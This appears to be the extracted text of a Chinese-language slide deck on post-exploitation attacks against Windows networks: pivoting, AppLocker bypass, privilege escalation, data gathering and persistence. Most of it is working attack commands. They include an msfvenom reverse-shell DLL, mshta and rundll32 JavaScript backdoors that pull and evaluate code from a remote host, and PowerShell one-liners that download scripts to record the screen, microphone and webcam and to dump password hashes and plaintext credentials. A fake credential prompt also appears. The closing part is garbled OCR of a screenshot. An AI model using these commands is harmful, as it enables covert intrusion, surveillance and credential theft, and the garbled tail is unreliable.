1、Shell is Only the Beginning后滲透階段的網(wǎng)絡攻防對抗As a offensive researcher, if you can dream it,someone has likely already done it and that someone isnt the kind of person who speaks at security consMatt Graeber3gstudentGood StudyGood HealthGood Attitude后滲透階段滲透測試以特定的業(yè)務系統(tǒng)作為目標，識 別出關鍵的基礎設施，并尋找客 戶組織最具價值和嘗試進行安全 保護

2、的信息和資產(chǎn)黑客攻擊黑客對攻擊戰(zhàn)果進一步擴大，以 及盡可能隱藏自身痕跡的過程打開一扇窗繞過看門狗我來作主人屋里有什么挖一個密道我來抓住你Open ProxyBypass ApplicationWhitelistingEscalate PrivilegesGather InformationPersistenceDetection and Mitigations目錄打開一扇窗Open Proxy為什么用代理?更好地接觸到目標所處環(huán)境使用已有shell的機器作為跳板，擴大戰(zhàn)果Its the beginning常用方法HTTP- Tunnel;Metasploit- Portpwd HTTP- Re

3、Georg; Metasploit- Socks4a端口轉(zhuǎn)發(fā)：Client- Lcx, Netsh;Socks代理：Client- Ew,Xsocks; 其他：SSH, ICMP 等Vpn！然而，我們可能會碰到這樣的情況：安裝殺毒軟件,攔截“惡意”程序設置應用程序白名單,限制白名單以外的程序運行 eg：Windows ApplockerWindows AppLocker簡介：即“應用程序控制策略”，可用來對可執(zhí)行程序、安裝程序和腳本進行控制 開啟默認規(guī)則后，除了默認路徑可以執(zhí)行外，其他路徑均無法執(zhí)行程序和腳本繞過看門狗Bypass Application Whitelisting繞過思路Hta

4、Office MacroCplChmPowershellRundll32 Regsvr32 RegsvcsInstallutil1、HtaMore：Mshta.exe vbscript:CreateObject(Wscript.Shell).Run(calc.exe,0,true)(window.cl ose)Mshta.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WScript.Shell).run(calc.exe ,0,true);tryh.Send();b=h.Res

5、ponseText;eval(b);catch(e)new%20ActiveX Object(WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);2、Office MacroMacroRaptor：Detect malicious VBA MacrosPython/decalage/oletools/wiki/mraptor3、CplDLL/CPL:生成Payload.dll:msfvenom -p windows/meterpreter/reverse_tcp -b x00 xff lhost=32 lport=8888 -

6、f dll -o payload.dll直接運行dll：rundll32 shell32.dll,Control_RunDLL payload.dll將dll重命名為cpl，雙擊運行普通的dll直接改后綴名From: /tips/160424、Chm高級組合技打造“完美” 捆綁后門：/tips/14254利用系統(tǒng)CHM文件實現(xiàn)隱蔽后門：那些年我們玩過的奇技淫巧5、PowershellCommand:powershell -nop -exec bypass -c IEX (New-Objectet.WebClient).DownloadString(http:/ip:port/)Get-Cont

7、ent payload.ps1 | iexcmd.exe /K key.snk$key =BwIAAAAkAABSU0EyAAQAAAEAAQBhXtvkSeH85E31z64cAX+X2PWGc6DHP9VaoD13CljtYau9SesUzKVLJdHphY5ppg5clHIGaL7nZbp6qukLH0lLEq/vW979GWzVA gSZaGVCFpuk6p1y69cSr3STlzljJrY76JIjeS4+RhbdWHp99y8QhwRllOC0qu/WxZaffHS2te/PKzIiTuFfcP46qxQoLR8s3QZhAJBnn9TGJkbix8MTgEt7hD1DC2hXv7

8、dKaC531ZWqGXB54OnuvFbD5P2t+vyvZuHNmAy3pX0BDXqwEfoZZ+hiIk1YUDSNOE79zwnpVP1+BN0PK5QCPCS+6zujfRlQpJ+nfHLLicweJ9uT7OG3g/P+JpXGN0/+Hitoluf o7Ucjh+WvZAU/dzrGny5stQtTmLxdhZbOsNDJpsqnzwEUfL5+o8OhujBHDm/ZQ0361mVsSVWrmgDPKHGGRx+7FbdgpBEq3m15/4zzg343V9NBwt1+qZU+TSVPU 0wRvkWiZRerjmDdehJIboWsx4V8aiWx8FPPngEmNz89

9、tBAQ8zbIrJFfmtYnj1fFmkNu3lglOefcacyYEHPX/tqcBuBIg/cpcDHps/6SGCCciX3tufnEeDMAQjmLku8X4zHc gJx6FpVK7qeEuvyV0OGKvNor9b/WKQHIHjkzG+z6nWHMoMYV5VMTZ0jLM5aZQ6ypwmFZaNmtL6KDzKv8L1YN2TkKjXEoWulXNliBpelsSJyuICplrCTPGGSxPGihT3r pZ9tbLZUefrFnLNiHfVjNi53Yg4=$Content = System.Convert:FromBase64String($key) Set-Co

10、ntent key.snk -Value $Content -Encoding Byte 編譯：C:WindowsMicrosoft.NETFrameworkv4.0.30319csc.exe /r:System.EnterpriseServices.dll /target:library /out:Regasm.dll /keyfile:key.snk Regasm.cs運行：C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe Regasm.dll ORC:WindowsMicrosoft.NETFrameworkv4.0.30319re

11、gasm.exe Regasm.dll/如果沒有管理員權限使用/U來運行C:WindowsMicrosoft.NETFrameworkv4.0.30319regsvcs.exe /U Regasm.dll C:WindowsMicrosoft.NETFrameworkv4.0.30319regasm.exe /U Regasm.dllFrom: /subTee/e1c54e1fdafc15674c9a9、InstallutilInstallUtil：編譯：C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe /unsafe/platform:x6

12、4 /out:InstallUtil.exe InstallUtil.cs編譯以后用/U參數(shù)運行：C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil.exe /U InstallUtil.exeFrom:http:/subt0 x10.blogspot.jp/2015/08/application-whitelisting-bypasses-101.html/tips/886210、可執(zhí)行目錄通過ps腳本掃描可寫入的路徑,腳本下載地址：http:/go.mssec.se/AppLockerBCFrom: /tips/1180411、最直

13、接的方式提權我來作主人Escalate Privileges常見的提權方式本地提權漏洞服務提權協(xié)議Phishing本地提權根據(jù)補丁號來確定是否存在漏洞的腳本：/GDSSecurity/Windows-Exploit-Suggester將受害者計算機systeminfo導出到文件:Systeminfo 1.txt使用腳本判斷存在的漏洞：python windows-exploit-suggester.py -database 2016-05-31-mssb.xls - systeminfo /Desktop/1.txt可能遇到的問題Exp被殺！將Exp改成Powershell：http:/evi

14、1cg.me/archives/MS16-032-Windows-Privilege-Escalation.htmlDemo Time服務提權常 用 服 務 ： Mssql，Mysql，Oracle，F(xiàn)tp 第 三 方 服 務 ： Dll劫持，文件劫持提權腳本Powerup：/tips/11989協(xié)議提權利用已知的Windows中的問題，以獲得本地權限提升 - Potato其利用NTLM中繼（特別是基于HTTP SMB中繼）和NBNS欺騙進行提權。 詳情：http:/tools.pwn.ren/2016/01/17/potato-windows.htmlPhishingMSF Ask模塊：ex

15、ploit/windows/local/ask通過runas方式來誘導用戶通過點擊uac驗證來獲取最高權限。 需要修改的msf腳本 metasploit/lib/msf/core/post/windows/runas.rbPhishing Demo3. sudo msfconsole sudo)u, )召巴 W1ndows7心中1屋里有什么Gather InformationGather Information成為了主人，或許我們需要看看屋里里面有什么？ 兩 種 情 況 ： 1：已經(jīng)提權有了最高權限，為所欲為2：未提權，用戶還有UAC保護，還不能做所有的事情Bypass UAC常用方法：使用I

16、FileOperation COM接口使用Wusa.exe的extract選項 遠程注入SHELLCODE 到傀儡進程 DLL劫持，劫持系統(tǒng)的DLL文件直接提權過UACPhishinghttp:/evi1cg.me/archives/Powershell_Bypass_UAC.html/?page_id=380有了權限，要做什么搜集mstsc記錄，瀏覽器歷史記錄，最近操作的文件，本機密碼等 鍵盤記錄屏幕錄像 NetripperGetPass Tips通過腳本彈出認證窗口，讓用戶輸入賬號密碼，由此得到用戶的明文密 碼。powershell腳本如下：From:/Ridter/Pentest/blo

17、b/master/note/Powershell_MSFCapture.mdGetPass TipsMSF模塊 post/windows/gather/phish_windows_credentials更多參考Installed ProgramsStartup ItemsInstalled ServicesSecurity ServicesFile/Printer Shares DatabaseServersCertificate AuthoritySensitive DataKey-loggingScreen captureNetwork traffic captureUser Inform

18、ation System ConfigurationPassword PolicySecurity PoliciesConfigured Wireless Networks and Keys新的攻擊方法無文件無文件姿勢之(一)-Powershell屏幕監(jiān)控：powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(http:/evi1cg.me/powershell/Show-TargetScreen.ps1); Show-TargetScreen”錄音：powershell -nop -exe

19、c bypass -c “IEX (New-Object Net.WebClient).DownloadString(/PowerShellMafia/PowerSploit/dev/Exfiltration/Get-MicrophoneAudio.ps1);Get- MicrophoneAudio -Path $env:TEMPsecret.wav -Length 10 -Alias SECRET”攝像頭監(jiān)控：powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(/xorrior/Rand

20、omPS-Scripts/master/MiniEye.ps1); Capture-MiniEye -RecordTime 2 - Path $env:temphack.avi”-Path $env:temphack.avi”抓Hash:powershell IEX (New-Object Net.WebClient).DownloadString(/samratashok/nishang/master/Gather/Get-PassHashes.ps1);Get-PassHashes抓明文：powershell IEX (New-Object Net.WebClient).DownloadS

21、tring(/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1); Invoke-Mimikatz無文件姿勢之(一)-PowershellEmpire:Metasploit:無文件姿勢之(二)- jsJsRat：rundll32.exe javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObject(WinHttp.WinHttpRequest. 5.1);h.Open(GET,:8081/connect,false);

22、tryh.S end();b=h.ResponseText;eval(b);catch(e)new%20ActiveXObject(WSc ript.Shell).Run(cmd /c taskkill /f /im rundll32.exe,0,true);From:JavaScript Backdoor /tips/11764JavaScript Phishing/tips/12386無文件姿勢之(三)- mshta啟動JsRat：Mshta javascript:.mshtml,RunHTMLApplication ;document.write();h=new%20ActiveXObj

23、ect(WinHttp.WinHttpRequest.5.1);h.Open(GET,01:9998/connect,false);tryh.Send();b=h.Res ponseText;eval(b);catch(e)new%20ActiveXObject( WScript.Shell).Run(cmd /c taskkill /f /im mshta.exe,0,true);無文件姿勢之(四)- sctSCT：regsvr32 /u /s/i:http:/urlto/calc.sctscrobj.dllCalc.sctFrom: Use SCT to

24、Bypass Application Whitelisting Protection /tips/15124無文件姿勢之(五) - wscWsc：rundll32.exe javascript:.mshtml,RunHTMLApplic ation ;document.write();GetObject(script:http:/urlto/calc.wsc)Calc.wscFrom: WSC、JSRAT and WMI Backdoor /tips/15575Demo Timeregsv32 /u /s /L00/calc.sct sc-叫）一，b魯.98挖一個密道Persistence常見

25、方法啟動項注冊表 wmiatschtasks利用已有的第三方服務新方法Bitsadmin：需要獲得管理員權限可開機自啟動、間隔啟動適用于Win7 、Win8、Server 2008及以上操作系統(tǒng)可繞過Autoruns對啟動項的檢測已提交至MSRC(Microsoft Security Response Center)Demo Time汕且， 仁 ，En1t ryOp t i o 飛Autoruns - Sysinternals: www.sysin t e r na ls .c o m1-1e l p譴 嶺 謐X霄Filter: 團Coale 竺三sI il1 LSi P rov 啦 rn已

26、Boo t E:x 眨 l.llt e巴I mage Hija也困 Appl mi t七 Me 切 ork Prnviders芯: 廠 l 氣i ：da: :飛o o 二r 芍 E v e y th in g迅 Logo rn芯 Explor erI rnt e m e t E x p lo r e r往 s中 e clu le cl T a志喝 Ser vices烏j Dr iv e r s 歸 oru n Entr.,Descri團ionPuhilisheImage Path窗 H KLMS ystemCurrentCont心Set S ervic esc : windo ws甲Time式

27、可 2016/ 3心.em婦rive 2013/ 4/ LSI 如 are SCSI Sto 巾 ort Ori LSIPMC-Sierra Sto 巾ort Driv可 . PMC-SierraA H O I 1 . 3 D e v i c e D e悶歸n e e d M i c ro D e v i c es AM D T e c hn o lo 守層Storage Rite DriveI Co. AMO Tec hn olog ies In c .悶 vanc eal M icro D e v ic e s巳 兇 妞areA D POO歡回囚 己 m cds at 己 巳amclsbs

28、 巳 圉 am 婦 a 巴囚 已res 已S知pt e c S 壓RA I D f S 伲 . PMC-Sierra. Inc .c : windo wss, 呾em婦rive. 勾 13/7 / c : w i n do w心 哼 tem32drive . 20 1 3 /7 凡 c : windo ws亟em碼rive 2012/ 12 c : w in do wss, 呾em婦rive. 勾 13/7 / ! c : windo w心 ysl:em 32drive. 2013/7處BOM Fun中 on 2 Device Ori. 1/lfincilow s (R) Vin 7 DD K

29、 p. c : window森 炟 em立 如 e 勾 13/ 8-/巳 鹵 bcmfn2巳 圉 e 1i 如 .ress回 兇 G PIOlnt el( R) Gig已b it 壓 a團 e r N D I . . Int e l C o rp o rat ion lnt el(R) 悶 om汀M) Proc.e sso . Int e l Corpo rat ion硝 H KLMS oft ware Micros吮 V.in do w s N TCurrentVersion Drive志 2c : w in do wss, 壺 m婦rive. 2013/ 3.名 c : w in do w

30、ss, 如 m32drive. 2013-/ 6. 名2016/ 3心.巳 口 msacm J華 c mM PEG 匼如-3 Audio Code .回vid c .c vidO n ep已K織 扁紨碼器F 厄 urlh m 旬Radius Inc .n stitut lntegriert. _. c : w in do wsw., 如 m32J3c o. _ _ 20 1 3 / & 名c : window心 如 m立 如 cvi. 2013-/ a,丘硝 H KL MS O 百 W AREO asses HtmlfileS hell OpenCo mmand( Default)巳 急 C: Program Fil. Int em et 巳平lo 面M ic ros忒t CC!I巾 C!Jrat i C!Jnc : p m g ra m fi l e s j nt e m et 這嘟 H KLMS ystemCurrentContro1S et S ervic es l/lfin Sock 2 Parameters Protoc ol_Catalog嘆 畫 alog _Entri